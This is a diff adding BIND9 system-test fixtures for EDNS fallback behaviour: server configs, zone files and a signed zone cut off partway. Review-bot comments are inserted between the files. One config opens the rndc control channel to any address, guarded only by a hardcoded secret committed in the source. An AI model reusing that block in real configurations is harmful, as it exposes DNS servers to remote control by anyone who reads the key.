+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ max-udp-size 4096;
+ edns-udp-size 4096;
+ nocookie-udp-size 4096;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/legacy/ns1/named2.conf.in b/bin/tests/system/legacy/ns1/named2.conf.in
new file mode 100644
index 0000000..9d4f1f6
--- /dev/null
+++ b/bin/tests/system/legacy/ns1/named2.conf.in
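Review bot: The `controls` block in legacy/ns1/named1.conf.in admits rndc clients with `allow { any; }` and authenticates them only with the literal secret `1234abcd8765` committed in the same file, and nothing in the file marks this as a fixture. That is tolerable while the listener stays bound to the 10.53.0.1 test alias, but the block is easy to copy into a real configuration, so I would add a comment above the key such as `/* Test-only rndc key, published in the source tree: never reuse outside the system tests. */`. If the harness always connects from the 10.53.0.x test aliases (not visible in this hunk), narrowing the ACL to that range would cost nothing. It is also worth a comment that `dnssec-validation yes;` has no trust anchor in this variant, whereas named2.conf.in includes trusted.conf.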
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ max-udp-size 4096;
+ edns-udp-size 4096;
+ nocookie-udp-size 4096;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/legacy/ns1/root.db b/bin/tests/system/legacy/ns1/root.db
new file mode 100644
index 0000000..175847a
--- /dev/null
+++ b/bin/tests/system/legacy/ns1/root.db
@@ -0,0 +1,33 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 60
+. SOA ns1. marka.isc.org 1 0 0 0 0
+. NS ns1.
+ns1. A 10.53.0.1
+dropedns. NS ns.dropedns.
+ns.dropedns. A 10.53.0.2
+dropedns-notcp. NS ns.dropedns-notcp.
+ns.dropedns-notcp. A 10.53.0.3
+plain. NS ns.plain.
+ns.plain. A 10.53.0.4
+plain-notcp. NS ns.plain-notcp.
+ns.plain-notcp. A 10.53.0.5
+edns512. NS ns.edns512.
+ns.edns512. A 10.53.0.6
+edns512-notcp. NS ns.edns512-notcp.
+ns.edns512-notcp. A 10.53.0.7
+ednsformerr. NS ns.ednsformerr.
+ns.ednsformerr. A 10.53.0.8
+ednsnotimp. NS ns.ednsnotimp.
+ns.ednsnotimp. A 10.53.0.9
+ednsrefused. NS ns.ednsrefused.
+ns.ednsrefused. A 10.53.0.10
diff --git a/bin/tests/system/legacy/ns1/trusted.conf b/bin/tests/system/legacy/ns1/trusted.conf
new file mode 100644
index 0000000..73500fc
--- /dev/null
+++ b/bin/tests/system/legacy/ns1/trusted.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+trust-anchors {
+ "edns512-notcp." static-key 257 3 10 "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";
+};
diff --git a/bin/tests/system/legacy/ns10/ednsrefused.db b/bin/tests/system/legacy/ns10/ednsrefused.db
new file mode 100644
index 0000000..9aa3a4a
--- /dev/null
+++ b/bin/tests/system/legacy/ns10/ednsrefused.db
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 60 SOA ns marka.isc.org. 1 0 0 0 0
+@ 60 NS ns
+ns 60 A 10.53.0.8
diff --git a/bin/tests/system/legacy/ns10/named.conf.in b/bin/tests/system/legacy/ns10/named.conf.in
new file mode 100644
index 0000000..628c51a
--- /dev/null
+++ b/bin/tests/system/legacy/ns10/named.conf.in
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.10;
+ notify-source 10.53.0.10;
+ transfer-source 10.53.0.10;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.10; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+};
+
+zone "ednsrefused" {
+ type primary;
+ file "ednsrefused.db";
+};
diff --git a/bin/tests/system/legacy/ns10/named.ednsrefused b/bin/tests/system/legacy/ns10/named.ednsrefused
new file mode 100644
index 0000000..6b43ac0
--- /dev/null
+++ b/bin/tests/system/legacy/ns10/named.ednsrefused
@@ -0,0 +1 @@
+ednsrefused
diff --git a/bin/tests/system/legacy/ns2/dropedns.db b/bin/tests/system/legacy/ns2/dropedns.db
new file mode 100644
index 0000000..06c023c
--- /dev/null
+++ b/bin/tests/system/legacy/ns2/dropedns.db
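Review bot: In legacy/ns10/ednsrefused.db the in-zone record `ns 60 A 10.53.0.8` does not match the server that hosts the zone: ns10/named.conf.in in this same commit listens on 10.53.0.10 and the root.db glue for ns.ednsrefused. is 10.53.0.10, while 10.53.0.8 is the glue for ns.ednsformerr. A resolver that replaces the glue with the authoritative answer could then send later queries for this zone to a different test server, so a check could pass or fail for the wrong reason. Unless the mismatch is deliberate, the line should read `ns 60 A 10.53.0.10`; if it is deliberate, a `;` comment in the zone file should say so.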
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 60 SOA ns marka.isc.org. 1 0 0 0 0
+@ 60 NS ns
+ns 60 A 10.53.0.2
diff --git a/bin/tests/system/legacy/ns2/named.conf.in b/bin/tests/system/legacy/ns2/named.conf.in
new file mode 100644
index 0000000..e570ffe
--- /dev/null
+++ b/bin/tests/system/legacy/ns2/named.conf.in
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+};
+
+zone "dropedns" {
+ type primary;
+ file "dropedns.db";
+};
diff --git a/bin/tests/system/legacy/ns2/named.dropedns b/bin/tests/system/legacy/ns2/named.dropedns
new file mode 100644
index 0000000..37dd9cf
--- /dev/null
+++ b/bin/tests/system/legacy/ns2/named.dropedns
@@ -0,0 +1 @@
+dropedns
diff --git a/bin/tests/system/legacy/ns3/dropedns-notcp.db b/bin/tests/system/legacy/ns3/dropedns-notcp.db
new file mode 100644
index 0000000..0ac44bc
--- /dev/null
+++ b/bin/tests/system/legacy/ns3/dropedns-notcp.db
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 60 SOA ns marka.isc.org. 1 0 0 0 0
+@ 60 NS ns
+ns 60 A 10.53.0.3
diff --git a/bin/tests/system/legacy/ns3/named.conf.in b/bin/tests/system/legacy/ns3/named.conf.in
new file mode 100644
index 0000000..3d89554
--- /dev/null
+++ b/bin/tests/system/legacy/ns3/named.conf.in
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+};
+
+zone "dropedns-notcp" {
+ type primary;
+ file "dropedns-notcp.db";
+};
diff --git a/bin/tests/system/legacy/ns3/named.dropedns b/bin/tests/system/legacy/ns3/named.dropedns
new file mode 100644
index 0000000..37dd9cf
--- /dev/null
+++ b/bin/tests/system/legacy/ns3/named.dropedns
@@ -0,0 +1 @@
+dropedns
diff --git a/bin/tests/system/legacy/ns3/named.notcp b/bin/tests/system/legacy/ns3/named.notcp
new file mode 100644
index 0000000..e25c3a8
--- /dev/null
+++ b/bin/tests/system/legacy/ns3/named.notcp
@@ -0,0 +1 @@
+notcp
diff --git a/bin/tests/system/legacy/ns4/named.args b/bin/tests/system/legacy/ns4/named.args
new file mode 100644
index 0000000..0fe6774
--- /dev/null
+++ b/bin/tests/system/legacy/ns4/named.args
@@ -0,0 +1 @@
+-m record,size,mctx -c named.conf -d 99 -D legacy-ns4 -X named.lock -g -U 4 -T maxcachesize=2097152 -T noedns
diff --git a/bin/tests/system/legacy/ns4/named.conf.in b/bin/tests/system/legacy/ns4/named.conf.in
new file mode 100644
index 0000000..32bdb05
--- /dev/null
+++ b/bin/tests/system/legacy/ns4/named.conf.in
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+};
+
+zone "plain" {
+ type primary;
+ file "plain.db";
+};
diff --git a/bin/tests/system/legacy/ns4/plain.db b/bin/tests/system/legacy/ns4/plain.db
new file mode 100644
index 0000000..2c20a70
--- /dev/null
+++ b/bin/tests/system/legacy/ns4/plain.db
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 60 SOA ns marka.isc.org. 1 0 0 0 0
+@ 60 NS ns
+ns 60 A 10.53.0.4
diff --git a/bin/tests/system/legacy/ns5/named.args b/bin/tests/system/legacy/ns5/named.args
new file mode 100644
index 0000000..364370a
--- /dev/null
+++ b/bin/tests/system/legacy/ns5/named.args
@@ -0,0 +1 @@
+-m record,size,mctx -c named.conf -d 99 -D legacy-ns5 -X named.lock -g -U 4 -T maxcachesize=2097152 -T noedns
diff --git a/bin/tests/system/legacy/ns5/named.conf.in b/bin/tests/system/legacy/ns5/named.conf.in
new file mode 100644
index 0000000..92e754f
--- /dev/null
+++ b/bin/tests/system/legacy/ns5/named.conf.in
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.5;
+ notify-source 10.53.0.5;
+ transfer-source 10.53.0.5;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.5; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+};
+
+zone "plain-notcp" {
+ type primary;
+ file "plain-notcp.db";
+};
diff --git a/bin/tests/system/legacy/ns5/named.notcp b/bin/tests/system/legacy/ns5/named.notcp
new file mode 100644
index 0000000..e25c3a8
--- /dev/null
+++ b/bin/tests/system/legacy/ns5/named.notcp
@@ -0,0 +1 @@
+notcp
diff --git a/bin/tests/system/legacy/ns5/plain-notcp.db b/bin/tests/system/legacy/ns5/plain-notcp.db
new file mode 100644
index 0000000..9c1a96b
--- /dev/null
+++ b/bin/tests/system/legacy/ns5/plain-notcp.db
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 60 SOA ns marka.isc.org. 1 0 0 0 0
+@ 60 NS ns
+ns 60 A 10.53.0.5
diff --git a/bin/tests/system/legacy/ns6/edns512.db.in b/bin/tests/system/legacy/ns6/edns512.db.in
new file mode 100644
index 0000000..7c2309b
--- /dev/null
+++ b/bin/tests/system/legacy/ns6/edns512.db.in
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 60 SOA ns marka.isc.org. 1 0 0 0 0
+@ 60 NS ns
+ns 60 A 10.53.0.6
diff --git a/bin/tests/system/legacy/ns6/edns512.db.signed b/bin/tests/system/legacy/ns6/edns512.db.signed
new file mode 100644
index 0000000..1493dd8
--- /dev/null
+++ b/bin/tests/system/legacy/ns6/edns512.db.signed
@@ -0,0 +1,248 @@ +; File written on Fri Dec 5 16:35:57 2014 +; dnssec_signzone version 9.11.0pre-alpha +edns512. 60 IN SOA ns.edns512. marka.isc.org. ( + 1 ; serial + 0 ; refresh (0 seconds) + 0 ; retry (0 seconds) + 0 ; expire (0 seconds) + 0 ; minimum (0 seconds) + ) + 60 RRSIG SOA 10 1 60 ( + 20441127043557 20141205043557 59033 edns512. + Xqas69NmX1N9jXSQntGXjcDTmZpO542fJURc + peYqY2gD445jxcH6FwmdMbzyPX4Nel+ZKdqx + wzb6U4S2sc7V1Wt8sOuNWil3LOaF9Mr2ZhL9 + /BgFaZixYdij0dFkUyuaSRfDx+3rvYtGZBRW + w55/U2bRvIgk0TjH+XHOUM+l5n755bsH1GFP + kRxhsYtsrUdWrB7Wn5lOdURsIf31xUfuMejR + QO5UIeqIgLhqE67GTy4SkfJW01G97Fkmt9Kx + 6K1gIwOeJy2rHN9WIF9vLJ2nyxWiSkmUka7l + Zw3kuR9fjgrFE8FEy4e/J8VIoq0v9bnwLh8a + woBnoQoZcfngu56e5hyF+g4t91JDbViOMAcJ + /DWsaGa7IF0o61Z51XoOakpgV4TP3VU53jFr + gfc4HDKP3sQQH9ZqzOpkXtoWGpSQ+u+2jSYu + NKa05LW4q1SJf8DHTiMxAUkkbikGHemskgIm + 0MESkBJI95/M3FbsRc9FswOeX0ZaRo3+6982 + elE1T0ZVPOWjPq1L5upWvUZDP0/d+2ns7Yt/ + MY5dKXjl74kQWTIDdeUC/8aaWFiJhsx7Haa1 + LhHtttBHtQQKQBo8uWVoTHDs9XY7pDcpkF6Z + /NzaCOVHFKh4Ahpr9xwY1J9Cy56oRIq5AEP9 + HmtN1vS04jbad220C+jfkDPJH9s64MKggQ4= ) + 60 NS ns.edns512. + 60 RRSIG NS 10 1 60 ( + 20441127043557 20141205043557 59033 edns512. + G9qrHjBQZ+jcueOhibtN18rXYEaLzWOZh1o2 + ZRQ9jS59BJd0KJ4taQzpz4CxA/juqEjSCmuY + Vynfeg15u4wvUf1/anC38Rp/QG0MHPrFily0 + DzeS/o2plYNCJ8r2wOmufG34rZakXZs2EdBf + 9s3+f+vqx+WsIs1TfaayGi90qDxVjn/SKGqb + v/eXGmYxyRMTaQ2x0+8y018MT+7zLbb3/VvV + EuD8X+J8N8dZiw3Rc1X6zj3usSOEO6wa4GRk + Oss3CMkYJuMND/3RG6XGt6du4hl3lK3+UK/4 + bb/D5FBlCJc76bkmo8ZmUjxKGXXGzh9w+bMT + rt0GfabUcbQyWyOifIsWOeIxYVpvUHusk7VT + gvvhfqXabGT7pPoCPz97IW820qTXKPPX/Rzb + DpRgWdVdQDWcmhb4RBDQrr1DDMmBJlz91S4Q + 0lDAnSMfMO2JIpJKOFNHnsMgLayEvdKOKQOH + ESKzbylxL4qARAq4zYbwz3vY6VDCV5MGcnAT + 3XMNM9RwRq0/qMuE8XfPmRaDimIOLaEojMpU + 59sFvaKzvn7t1h1ZQVLuJqu3jkWwz4iUtwts + +av/IdbbKP6spPy4gimngRWbpiiQHESNx9kp + EHB85/UAR28RffvPadNoQq1eaAOQJCEJf7xv + BOGytbBxrLFsTWrmrB5uCb9hujWu04unJyc= ) + 0 NSEC ns.edns512. 
NS SOA RRSIG NSEC DNSKEY + 0 RRSIG NSEC 10 1 0 ( + 20441127043557 20141205043557 59033 edns512. + BY9hQLrs9zkekTWeXmSqT+8dCZ+vaRBGSSUf + E8BUr4gYbuzo7xeOpHjMkpO7IpkT80TRcIQf + AkleOlf3+XcUIhK9/7C/xu0/jI3XbaBs5NNJ + 0zhf0CmJBzeCSMtxXInDLGkhGMgoclB3j5+f + nme65PHYFVEVWS/64ZRd71XUUV2kTk4slfqx + YNGhT7IPcgUTNOrsBGi6SmH2iKMseg2BfFOt + +2RRY9HBlfKywozHz9jjWsEmRZke3fqfpuln + C6r3EQ873XBjrsOrDerNaSDf29Zl46SQs3UQ + kCJZ0gWEReRvvooLlh4+PsbIW1M0FMmsImfv + l1kPh8kQgJVxljba7kXX3k5bc/YwTQE3rI6e + ametdxSwbxcUZiUr8rM2ZF4IfqFGS05sD+Cz + 68dDDyR/vu+6Rt/U+39bzg2tI4Ok6aQxOgXP + v+hhOC8Sancpmn+SHLQvYoMW/VxR633TeyW3 + zn4Xhcp7aD4TdKHGK9PpVrtWcx50zZEXu17c + essPk0yDOarTmoqx0r3LSe5jjDLJJ5kZxWxM + nlfkw3aKQwQMuyaVWN+Ruz7KRgD9lkwoOic4 + Qs/7PYpMrV58YVlEa7aESd3+qPHjv6dD99Zm + Fe6bc+SqUTKwjeYfIm/luc70FpykGhdxTK/E + dEjQJ8jMrAzCCr/or/JOHgV1yrTCfU3hAN8= ) + 60 DNSKEY 256 3 10 ( + AwEAAcEBkn/cuVhdRTWMHt19O7h9F4Hx2t68 + u1JUZg7swLLvwfljqnNYjsKYk9EzUhIaYOAH + tVe7//cYwoVU4BFhY2DGbx1YE1LnKIGxfqpo + pFxDZC34TTl6jpoTP6kvj+XpeO0HfF2+DcyN + gnQcMGgHXyLWeRUJFt1As6o9tmsBiInGIZMT + E3/rANhtAGMLNzhRLN7CS/Tc5GhKaL66ueby + EYenEOAyDVgsuhr8Q9D5ka6xZmxzXFVswy2K + vsSxu9aoxVq4nACjIeTZ4GJy0v83zclV7hA+ + 5jlPDXMFtIpvwux5XALrNkUUPq+Fb5sc5/u1 + 41LcvdASnlk58I77HbsnfausvDxdYYxEns7K + 9e9N85dwyreM/OGTmm8p4hNDngZESAea7MrS + CsJpOGn9XLkVe6gZnBgB1cra+ezzTSWn+4QH + 17lIhFXYNjMV83df2h/gH3Gmthqnr9RgknZg + a8B/Czc7TeX6iy2gAOshKGyb6w12eJim1L8t + S5T138V8d6SigzxZz1raiJNolVhXyA8SbbDp + gBrcoEXN/WjwvWI+2ol5gzlqMeNw/F9SMoWd + pGIWkkNCNWBbhLWhp6qfhpRLUFwVys54LGOI + GSVRd9uJmc2hPdXoP8ephnCIeNJb8Zp6Dnps + syN0JaF815dKkOHff9GEjaiRLj0xWvtZSqNF + aGoB + ) ; ZSK; alg = RSASHA512; key id = 59033 + 60 DNSKEY 257 3 10 ( + AwEAAcEBkn/cuVhdRTWMHt19O7h9F4Hx2t68 + u1JUZg7swLLvwfljqnNYjsKYk9EzUhIaYOAH + tVe7//cYwoVU4BFhY2DGbx1YE1LnKIGxfqpo + pFxDZC34TTl6jpoTP6kvj+XpeO0HfF2+DcyN + gnQcMGgHXyLWeRUJFt1As6o9tmsBiInGIZMT + E3/rANhtAGMLNzhRLN7CS/Tc5GhKaL66ueby + EYenEOAyDVgsuhr8Q9D5ka6xZmxzXFVswy2K + vsSxu9aoxVq4nACjIeTZ4GJy0v83zclV7hA+ + 
5jlPDXMFtIpvwux5XALrNkUUPq+Fb5sc5/u1 + 41LcvdASnlk58I77HbsnfausvDxdYYxEns7K + 9e9N85dwyreM/OGTmm8p4hNDngZESAea7MrS + CsJpOGn9XLkVe6gZnBgB1cra+ezzTSWn+4QH + 17lIhFXYNjMV83df2h/gH3Gmthqnr9RgknZg + a8B/Czc7TeX6iy2gAOshKGyb6w12eJim1L8t + S5T138V8d6SigzxZz1raiJNolVhXyA8SbbDp + gBrcoEXN/WjwvWI+2ol5gzlqMeNw/F9SMoWd + pGIWkkNCNWBbhLWhp6qfhpRLUFwVys54LGOI + GSVRd9uJmc2hPdXoP8ephnCIeNJb8Zp6Dnps + syN0JaF815dKkOHff9GEjaiRLj0xWvtZSqNF + aGoB + ) ; KSK; alg = RSASHA512; key id = 59034 + 60 RRSIG DNSKEY 10 1 60 ( + 20441127043557 20141205043557 59033 edns512. + QYXBCtuqzY2R7s4sIDFmSkhLqXXYAAdm5T3x + MddwlppybV0tEnkRdgWD+3VL2PAdr+MMFigm + OCohMdYAXOhJwW9OHiSkeIpYamojB+eBPDBl + 63guu73QADTUmffZirWvNb79reVHmKkTPdLm + nEfEs7VEtTm1Wj60jT1q1RIkJDvtIo7mJgRO + MYKyJBCocBUSGGXoHCA+djXCqKiuLavQ2rBu + IGxXtB2Pf2Wkw/9xxhBo5vTrT1u+V2hFGMPO + vnODw0lU4XiSjeBrmMXnadrsx8DrM4KInwAL + A9VolAXXWjqvD3il54ziqikkjTYnOeyik3QM + R7UtDrLTLnAeyeL9rhLuBk2dnsE+XaJ2PP3q + iD7LiEQLDGGKJRC3P6odVb17e7q0mDtH2HId + VdjGap+W6mxql8aVrRHs5P0t/5GJmW83JbJi + e7W3Y1ikoimB4S6FPBbjadaUEpzUs806SIdj + v/AZoydoa/qOdre9Pur51At2dQNgeFhIL9w+ + 2IcN3pRjojTPrMToqVRqOySzx6OzvSmnydDg + PMe4yoqpzumJLQXJ2IceEg5rlLaRjMOBYSW8 + VuqLMfEup+KBEg+nZv6mAmx1KLuIgO5q5ae9 + tq0I7eaV/EPvBYxO7j2RA0AbtmGSUyP4ZzTy + FjIYfOqzwwPjONzLQ2E/RsbS5MlIAk92aC0= ) + 60 RRSIG DNSKEY 10 1 60 ( + 20441127043557 20141205043557 59034 edns512. 
+ V13nqWSVWVdkN/RZnJ+4ywjju3JoRbQrpnjL + RKPi4U8cOc1nnh64y4RvaIe+2TI1hiVKYHfE + 9XGXZb2zhxrWMq8kLjpIRN+jpItoFXu7rSRA + GmiHz7v7PW7+UHz7fhGHKJuqQuodBokTlHhR + /0mNkaDQ96OOyG/aLOfj6Jj16KEBfyM8hALy + jwWE8EOKzV37CLBWawazXVY/EAP5jzQuAaot + SPh3wFuJ2L6rB4lkh5IwaeXU42ip7eirT2i5 + V9W2v01UWbQ3Jab1DJlNwVgNGzXYvCvLU9zG + EHbqVcDuMErOqFzePLhK7Aqh8LIB9DnQlFqE + 2tyATJb0hcMetMNRiInJFGPMekdNiTguhLMC + GyEjzEJdiKT0XA/lVF9MVyEqL2HeSj3NYRe6 + ScfqAZArEPgu+UI0CaiC2eR8KdQCPcwUJuNE + mNdv3F9CnNvq3w72Q3TJpOaFzuToQh8JleTN + Ty3zRkVGKWSDNs+px9sedJkRpaRyVQVXJruT + /boYT8HgK8R6PXIp3Ujud0SSlVjPQrlbxF/P + 5saDwruBkYPRKNGBC0OVcHhI+w1N3gkp59kY + CqBih/kazLfWjUXxc130OEkPhmS1zUEOjsl2 + fmRhKrlRmPM1DyHqFiEVogj/nfZ+VCiO4bIx + F+vVQX+EqQo0p3bRvfSxpY/I7fM0P6/cZlQ= ) +txt500.edns512. 60 IN TXT "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" "01234567890123456789012345678901234567890123456789" + 60 RRSIG TXT 10 2 60 ( + 20441127043557 20141205043557 59033 edns512. 
+ OtzlxomsR6xFpPI19gEpl5edx+rbqjrhR6CI + zWiqpjHv5HhdydRPIW6M8KSuBDK/AOuUCy1P + 9qOy7J0QUIGK8Ds4wcw09VCqkxImVu6w7e+z + HoaNJzKT4Oxf1LLrvUnitqEbS4cME15r+Fj4 + cUlkpSZgttMcGhV+VPEiG3z56KzXNAViapJl + HaV10Be0nx0UtEpftkAtgnkXwNPIaDrbULUI + tvD/uvu3ICV5gRATriy3RcanB9c0xKEO9NAm + nbWQD8a7o+zs3OqqDRcZqvq0PRuz7X8Q4T/n + fPYNkGoph1etQTaM1F6V0gP/2Hxv/oQclL77 + IQSRZ8zCZJech8qgBlEHgdY/4hqJzJtO98Ha + OfB7ixmHp9fE5dGInIot6eMKN+Utnl2KLjjn + oO05gh9VESsgDIOM2amN/aViP54ad5DFtJni + 1mLRhV7FmBD2WSkdZF4/u4SvxjKYpWF1pspO + xNPhgaavnAqkM361P0kV13StLXzff9g9QsuB + S8Z4v0Ypiv4s5SlXsKeTpa0Y1gKXf8U1UZGq + /+2089ZurC8S1D89m72M3hgP80TDnLeuDCHY + /3tpU4V0yZ0u2riJG8/4MVFeeo8suk/z2gq0 + nvs3YD7U0XB5ozLUlnKTT+NK49lnv5xoIByL + +ezP5zXMz4D0KAfKk+Wn84RgYn3ADABr1ZI= ) + 0 NSEC edns512. TXT RRSIG NSEC + 0 RRSIG NSEC 10 2 0 ( + 20441127043557 20141205043557 59033 edns512. + nFZKkyTy5O+je3VUaWt/eqVDqPtpktHFJt5X + K1TJHvRbuEanNMJoQJidS6ZhawgJhK54qgcM + klsR2n/eZ61Wbr1dpUscI7PNWGtZThW18d6W + GQjfxvLVSi+YVcSlAt5Jfc+4KZ+Mcte25xOD + DJMWVXTv2AgKt9T7JdOQTrpiugkpflct87FQ + 95POqtj5j72xnTvpjzaDcL22rD5q3kLQlQ14 + xDZV1hOgqCYgbYVgwxgxigWSuWkKjiHiYR9o + YkLPkWHYNn7aDDFpAve4MJXRpuwPP9/TLQKH + hV4H8q7CZK30uKpUqy38JGTQzr7FDgTekGCd + InPLwSrURIkn3rVyCRq7PgvSBNXNW+3h9tYX + gMj6FDNyroWRH1eWmDFg3BmXKu6hUxrZ2fOk + wyhJ5M0LtZinjd5RuHy0CCKFuFA/Gv3Zga0m + vc34auzfwLnQmJc94j3JfwUGlMDeKtizKrhK + 